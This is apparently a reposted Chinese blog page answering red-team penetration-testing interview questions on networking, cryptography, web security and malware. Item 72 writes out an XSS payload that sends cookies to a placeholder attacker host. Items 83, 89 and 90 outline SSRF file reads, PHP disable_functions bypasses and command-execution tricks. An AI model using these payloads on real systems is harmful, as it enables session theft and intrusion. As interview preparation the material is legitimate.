2025年滲透測試面試題總結-滲透測試紅隊面試三(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

滲透測試紅隊面試三

六十一、主機被入侵自查解決方案

六十二、NAT(網絡地址轉換)協議

六十三、內網穿透

六十四、虛擬專用網絡(VPN)

六十五、二層交換機

六十六、路由技術

六十七、三層交換機

六十八、IPv6地址表示

六十九、對稱加密與非對稱加密

七十、同源策略

七十一、Cookie存儲與訪問

七十二、XSS盜取Cookie

七十三、TCP與UDP區別及SYN攻擊

七十四、安全證書

七十五、DVWA搭建

七十六、滲透測試流程

七十七、XSS防御

七十八、IIS防護

七十九、虛擬機連接方式

八十、XSS與Cookie登錄

八十一、JNI函數名轉換

八十二、Frida與Xposed

八十三、SSRF利用

八十四、宏病毒

八十五、APP加殼

八十六、WannaCry特征

八十七、ARM32返回值與返回地址

八十八、HTTPS握手技術

八十九、PHP disable_functions繞過

九十、任意命令執行方式

滲透測試紅隊面試三

六十一、主機被入侵,你會如何處理這件事自查解決方案:六十二、 NAT(網絡地址轉換)協議六十三、內網穿透六十四、虛擬專用網絡六十五、二層交換機六十六、路由技術六十七、三層交換機六十八、IPv6 地址表示六十九、對稱加密非對稱加密?七十、什么是同源策略?七十一、cookie 存在哪里?可以打開嗎七十二、xss 如何盜取 cookie?七十三、tcp、udp 的區別及 tcp 三次握手,syn 攻擊?七十四、證書要考哪些?七十五、DVWA 是如何搭建的?七十六、滲透測試的流程是什么七十七、xss 如何防御七十八、IIS 服務器應該做哪些方面的保護措施:七十九、虛擬機的幾種連接方式及原理八十、xss 有 cookie 一定可以無用戶名密碼登錄嗎?八十一、 JNI 函數在 java 中函數名為 com.didi.security.main,C 中的函數名是什么樣的?八十二、Frida 和 Xposed 框架?八十三、SSRF 利用方式?八十四、宏病毒?八十五、APP 加殼?八十六、勒索軟件 Wanacry 的特征?蠕蟲、僵尸病毒八十七、ARM32 位指令中,返回值和返回地址保存在哪個寄存器中?八十八、HTTPS 握手過程中用到哪些技術?八十九、Linux 中 PHP 環境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system,九十、請寫出兩種有可能實現任意命令執行的方式?
六十一、主機被入侵自查解決方案
  1. 隔離與止損
    • 立即斷開網絡連接,阻斷攻擊者持續訪問路徑;備份當前系統狀態(內存鏡像、磁盤快照)用于取證。
    • 禁用可疑賬戶,檢查系統日志(如/var/log/auth.log 或Windows事件查看器)定位異常登錄記錄。
  2. 漏洞分析與修復
    • 使用工具(如rkhunterClamAV)掃描后門程序;比對文件哈希值識別篡改文件。
    • 修復已知漏洞,更新系統補丁,關閉非必要服務端口(如netstat -ano排查)。
  3. 加固與監控
    • 配置防火墻規則(如iptables/Windows防火墻)、啟用IDS/IPS系統;部署HIDS(主機入侵檢測系統)。
    • 審計SSH密鑰、口令策略;啟用多因素認證(MFA)。

六十二、NAT(網絡地址轉換)協議
  1. 核心功能
    • 解決IPv4地址短缺問題,通過映射內網私有IP到公網IP(如PAT實現端口復用)。
    • 靜態NAT(一對一映射)、動態NAT(地址池分配)、PAT(Port Address Translation,NAT Overload)。
  2. 應用場景
    • 家庭路由通過NAT共享公網IP;企業內網隱藏真實拓撲結構。
  3. 局限性
    • 破壞端到端透明性,導致P2P應用穿透困難(需STUN/TURN協議輔助)。

六十三、內網穿透
  1. 技術原理
    • 反向代理(如Ngrok):公網服務器中轉內網服務流量。
    • 隧道技術(如SSH隧道、VPN):封裝內網流量繞過防火墻。
  2. 典型工具
    • Frp:支持TCP/UDP端口映射;ZeroTier:基于P2P的虛擬局域網。
  3. 安全風險
    • 暴露內網服務可能引入攻擊面(如未授權訪問數據庫)。

六十四、虛擬專用網絡(VPN)
  1. 核心機制
    • 加密隧道(IPsec/OpenVPN)保障數據機密性;支持遠程訪問內網資源。
  2. 協議對比
    • IPsec(網絡層加密,兼容性差)、SSL VPN(基于HTTPS,易穿透防火墻)。
  3. 企業應用
    • 分支機構互聯(Site-to-Site VPN);員工遠程辦公(Client-to-Site VPN)。

六十五、二層交換機
  1. 工作原理
    • 基于MAC地址表轉發幀,支持VLAN劃分隔離廣播域。
  2. 局限性
    • 無法跨子網通信,需依賴路由器或三層交換機。

六十六、路由技術
  1. 路由類型
    • 靜態路由(手動配置)、動態路由協議(OSPF、BGP基于鏈路狀態或路徑矢量)。
  2. NAT與負載均衡
    • 結合策略路由實現流量分流(如企業多出口場景)。

六十七、三層交換機
  1. 核心特性
    • 集成路由功能(基于ASIC硬件加速),支持VLAN間路由。
  2. 應用場景
    • 數據中心核心層實現高速路由轉發。

六十八、IPv6地址表示
  1. 格式規則
    • 8組16進制數(如2001:0db8:85a3::8a2e:0370:7334),省略前導零和連續零組。
  2. 地址類型
    • 單播(Global Unicast)、組播(Multicast)、鏈路本地(FE80::/10)。

六十九、對稱加密與非對稱加密
  1. 對稱加密(AES)
    • 加解密密鑰相同,速度快,適合大數據量傳輸。
  2. 非對稱加密(RSA)
    • 公鑰加密、私鑰解密,解決密鑰分發問題(如SSL證書交換)。
  3. 混合應用
    • TLS握手階段用RSA交換AES會話密鑰。

七十、同源策略
  1. 定義
    • 瀏覽器阻止跨域腳本訪問其他源的DOM/Cookie(同源:協議+域名+端口一致)。
  2. 繞過機制
    • CORS(服務端設置Access-Control-Allow-Origin)、JSONP(動態插入<script>標簽)。

七十一、Cookie存儲與訪問
  1. 存儲位置
    • 瀏覽器本地(Chrome:chrome://settings/siteData),受HttpOnly標記限制腳本訪問。
  2. 安全風險
    • 明文存儲敏感信息可能被XSS竊取(需Secure+HttpOnly+SameSite防護)。

七十二、XSS盜取Cookie
  1. 攻擊流程
    • 注入<script>document.location='http://attacker/?cookie='+document.cookie</script>
  2. 防御措施
    • 設置HttpOnly阻止JS讀取Cookie;輸入過濾與輸出編碼。

七十三、TCP與UDP區別及SYN攻擊
  1. 協議對比
    • TCP可靠傳輸(ACK確認、重傳)、面向連接;UDP無連接、低延遲(適合音視頻流)。
  2. 三次握手
    • SYN→SYN-ACK→ACK;SYN攻擊通過偽造源IP耗盡服務器半連接隊列。
  3. 防御手段
    • SYN Cookie機制(無狀態驗證)、限制并發半連接數。

七十四、安全證書
  1. 認證體系
    • OSCP(滲透測試)、CISSP(安全管理)、CEH(道德黑客)。
  2. 技能方向
    • 網絡攻防(PNPT)、云安全(CCSP)、逆向工程(GREM)。

七十五、DVWA搭建
  1. 依賴環境
    • LAMP/WAMP環境(PHP 5+、MySQL);配置config.inc.php 設置數據庫連接。
  2. 漏洞配置
    • 手動調整安全等級(Low/High)模擬不同難度場景。

七十六、滲透測試流程
  1. 階段劃分
    • 信息收集(Whois、Nmap)、漏洞掃描(Nessus)、利用(Metasploit)、后滲透(權限維持)。
  2. 合規性
    • 授權書(Scope定義)、規避法律風險(如避免DoS攻擊)。

七十七、XSS防御
  1. 輸入過濾
    • 白名單校驗(如僅允許字母數字);轉義特殊字符(<&lt;)。
  2. CSP策略
    • 響應頭Content-Security-Policy限制腳本來源(如'self')。

七十八、IIS防護
  1. 加固措施
    • 禁用WebDAV、關閉目錄遍歷;配置請求過濾規則(拒絕../路徑)。
  2. 日志審計
    • 啟用W3C日志記錄,監控異常請求(如大量404錯誤)。

七十九、虛擬機連接方式
  1. 橋接模式
    • 虛擬機直接接入物理網絡,獨立IP(類似獨立主機)。
  2. NAT模式
    • 共享宿主機IP,通過虛擬NAT設備進行地址轉換。

八十、XSS與Cookie登錄
  1. 條件限制
    • 需目標站點會話僅依賴Cookie(無IP綁定/MFA);若Cookie標記Secure則需HTTPS劫持。

八十一、JNI函數名轉換
  1. 命名規則
    • C函數名格式:Java_完整類名_方法名(如Java_com_didi_security_main),特殊字符用_1轉義。

八十二、Frida與Xposed
  1. Frida特性
    • 動態插樁(D-Bus通信),支持跨進程Hook(如Android/iOS應用內存修改)。
  2. Xposed局限
    • 需Root環境,基于模塊化Hook框架(全局生效)。

八十三、SSRF利用
  1. 攻擊向量
    • 利用協議處理漏洞(如file:///etc/passwddict://探測內網端口)。
  2. 繞過技巧
    • 域名重定向(短網址)、IPv6地址格式混淆。

八十四、宏病毒
  1. 傳播方式
    • 依附Office文檔宏代碼,利用社會工程誘導啟用宏。
  2. 檢測清除
    • 禁用宏執行;使用殺毒軟件掃描*.docm文件。

八十五、APP加殼
  1. 技術原理
    • 加密DEX/ELF文件,運行時動態解密(如梆梆安全、UPX)。
  2. 對抗脫殼
    • 反調試檢測、多殼嵌套、代碼混淆(OLLVM)。

八十六、WannaCry特征
  1. 傳播方式
    • 利用SMB漏洞(EternalBlue)橫向擴散;加密文件擴展名(.WNCRY)。
  2. 防御措施
    • 關閉445端口;安裝MS17-010補丁。

八十七、ARM32返回值與返回地址
  1. 寄存器分配
    • 返回值:R0(32位)/R0-R1(64位);返回地址:LR(R14),函數退出時通過BX LR跳轉。

八十八、HTTPS握手技術
  1. 密鑰交換
    • ECDHE算法生成臨時密鑰(前向保密);RSA驗證證書鏈。
  2. 會話復用
    • Session ID/Ticket減少握手開銷。

八十九、PHP disable_functions繞過
  1. 未禁用函數利用
    • mail()函數通過LD_PRELOAD注入共享庫;imagick模塊處理惡意圖片觸發命令。
  2. 反序列化漏洞
    • 利用phar://協議觸發反序列化操作鏈(如GadgetChain)。

九十、任意命令執行方式
  1. 環境變量注入
    • 控制PATH變量指向惡意二進制(如echo /tmp > PATH)。
  2. 外部程序調用
    • 利用ImageMagick處理漏洞(CVE-2016-3714)執行系統命令。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/82958.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/82958.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/82958.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

springboot-web基礎

21.web spring MVC 基于瀏覽器的 B/S 結構應用十分流行。Spring Boot 非常適合 Web 應用開發。可以使用嵌入式 Tomcat、Jetty、 Undertow 或 Netty 創建一個自包含的 HTTP 服務器。一個 Spring Boot 的 Web 應用能夠自己獨立運行&#xff0c;不依賴需 要安裝的 Tomcat&#x…

重構Cursor無限電子郵箱注冊系統的技術實踐

引言 在當今數字化時代&#xff0c;電子郵箱已成為個人和企業網絡身份的基礎。作為開發者&#xff0c;我們往往會遇到需要設計注冊系統的場景&#xff0c;而如何構建一個既安全又用戶友好的郵箱注冊系統&#xff0c;是值得深入探討的話題。本文將圍繞Cursor郵箱系統的技術重構…

2025.05.10京東機考真題算法崗-第三題

?? 點擊直達筆試專欄 ??《大廠筆試突圍》 ?? 春秋招筆試突圍在線OJ ?? 筆試突圍OJ 03. 忍者屋頂之旅 問題描述 LYA是一位身手敏捷的忍者,正在一個古老的村莊進行飛檐走壁的訓練。村莊有兩排房屋,每排從左到右排列著 n n

vscode不能跳轉到同一個工作區的其他文件夾

明白了&#xff0c;你說的“第二種情況”是指&#xff1a; 你先打開的是項目文件夾&#xff08;比如 MyProject&#xff09;&#xff0c;然后通過 VS Code 的“添加文件夾到工作區”功能&#xff0c;把 ThirdPartyLib 文件夾添加進來。 結果&#xff0c;項目代碼里 #include “…

FastAPI 和 MongoDB 實現請求頭參數處理的示例,并在 React 中進行渲染

FastAPI 和 MongoDB 后端 安裝必要的庫 安裝 FastAPI、Uvicorn、Motor&#xff08;用于 MongoDB 的異步驅動&#xff09;和 Pydantic&#xff08;用于數據驗證&#xff09;。 pip install fastapi uvicorn motor pydantic創建 FastAPI 應用 創建一個文件 main.py&#xff0c;并…

技術倫理雙軌認證如何重構AI工程師能力評估體系——基于AAIA框架的技術解析與行業實證研究

引言&#xff1a;AI工程師能力評估的范式轉型 2025年全球人工智能產業呈現出兩大特征&#xff1a;技術迭代加速與監管框架完善。據Gartner數據顯示&#xff0c;全球75%的企業在AI項目部署中遭遇技術倫理混合型難題&#xff0c;傳統單維度技術認證體系已無法滿足產業需求。本文…

03.Golang 切片(slice)源碼分析(二、append實現)

Golang 切片&#xff08;slice&#xff09;源碼分析&#xff08;二、append實現&#xff09; 前言&#xff1a; Golang 切片&#xff08;slice&#xff09;源碼分析&#xff08;一、定義與基礎操作實現&#xff09; 在前面的文章我們介紹了&#xff0c;切片的結構體與創建\擴容…

mysql常用方法

mysql常用方法 一、基本用法 -- MySQL創建唯一索引 CREATE UNIQUE INDEX 索引名 ON 表名(列名1,列名2,...); --也可以使用ALTER TABLE語句給現有表添加唯一索引&#xff08;UNIQUE&#xff09; ALTER TABLE 表名 ADD CONSTRAINT 索引名 UNIQUE KEY(列名1,列名2,...); alter t…

STM32F103C8T6板子使用說明

第一章 計算機體系結構(了解) 后續在板子上開發的時候&#xff0c;需要考慮是否有操作系統 方式一&#xff1a;有操作系統&#xff0c;通過c庫通過os api操作硬件方式二&#xff1a;無操作系統&#xff0c; 通過c庫通過固件庫操作硬件 第二章 STM32開發板概述 板子/開發板&…

PBR材質-Unity/Blender/UE

目錄 前言&#xff1a; 一、Unity&#xff1a; 二、Blender&#xff1a; 三、UE&#xff1a; 四、全家福&#xff1a; 五、后記&#xff1a; 前言&#xff1a; PBR流程作為表達物理效果的經典方式&#xff0c;很值得一學。紋理貼圖使用的是上一期的Textures | cgbookcas…

【生產實踐】Linux中/usr/bin、/usr/sbin與/usr/local的關系解析(2025年技術規范)

一、核心定位與功能劃分 /usr/bin&#xff1a;用戶級通用命令庫 ? 定位&#xff1a;存儲系統預裝的用戶級可執行文件&#xff0c;這些命令通常由Linux發行版官方軟件包管理器&#xff08;如APT、YUM&#xff09;安裝&#xff0c;屬于系統默認功能的一部分。 ? 示例命令&#…

智能網聯汽車 “中央計算” 博弈:RTOS 與跨域融合的算力分配挑戰

一、引言 隨著智能駕駛技術的飛速發展&#xff0c;汽車逐漸從傳統的交通工具演變為移動的智能終端。智能網聯汽車的核心競爭力日益體現在其強大的計算能力和高效的算力管理上。汽車電子電氣架構&#xff08;EEA&#xff09;正經歷從分布式架構向 “中央計算 區域控制” 架構的…

【PDF】使用Adobe Acrobat dc添加水印和加密

【PDF】使用Adobe Acrobat dc添加水印和加密 文章目錄 [TOC](文章目錄) 前言一、添加保護加密口令二、添加水印三、實驗四、參考文章總結 實驗工具&#xff1a; 1.Adobe Acrobat dc 前言 提示&#xff1a;以下是本篇文章正文內容&#xff0c;下面案例可供參考 一、添加保護加…

python面試實戰經驗分享

2025/3/28第一面 杭州實在智能 見習python開發工程師 1、Python方法中參數默認值可以是列表或者字典嗎? 在Python中,函數參數的默認值可以是列表或字典,列表或者字典在初始化應在函數體內,如果不正確處理,可能會導致所有調用都共享同一個列表。 2、協程、線性和進程 進程…

MIST:一鍵解鎖 macOS 歷史版本,舊系統安裝不再難!

在 Mac 電腦的使用過程中&#xff0c;你是否遇到過這些困擾&#xff1f;為了運行一款經典設計軟件&#xff0c;新系統卻無法兼容&#xff1b;或是想給老舊 Mac 設備升級&#xff0c;卻找不到適配的系統版本。而 App Store 里&#xff0c;舊版 macOS 安裝包就像 “隱藏副本”&am…

win10 局域網內聊天

在 Windows 10 的局域網 中&#xff0c;如果你想實現 多個用戶之間的聊天功能&#xff0c;可以選擇以下幾種方案&#xff0c;取決于你需要的是&#xff1a; ? ? 命令行純文字聊天&#xff08;如 Linux talk&#xff09; ? ? 圖形界面聊天室 ? ? 局域網廣播消息 ? ? 多人…

Android CountDownTimer重寫

Android 倒計時器重寫&#xff0c;實現可重復使用&#xff0c;動態修改計時時間 CountDownTimerRew 是一個可重寫、動態修改計時時間的 Android 倒計時器類。它允許開發者設置倒計時總時長、間隔時間&#xff0c;并通過 onTick 和 onFinish 方法實現定時回調。該類支持動態修改…

dp自動化登陸之hCaptcha 驗證碼

hCaptcha 是一種常見的驗證碼服務&#xff0c;用于區分人類用戶和自動化程序。由于其基于圖像識別和行為分析&#xff0c;下面介紹如何使用自動化點擊驗證碼完成登陸。 思路&#xff1a;登陸目標網站觸發驗證碼&#xff0c;截圖并發給打碼平臺返回坐標&#xff0c;模擬人工點擊…

【工作記錄】crmeb后端項目打開、運行

1、下載代碼 1&#xff09;安裝git 不再詳述 2&#xff09;git拉代碼 項目地址如下&#xff0c;在vscode-分支中拉代碼 # 克隆項目 git clone https://gitee.com/ZhongBangKeJi/crmeb_java/ 截圖如下是已經成功拉下來 注意安裝對應版本 2、maven配置 安裝配置見&#x…

敏捷軟件開發與Scrum

目錄 一、敏捷軟件開發 敏捷開發原則 敏捷開發特點 二、Scrum (一)Scrum 基礎知識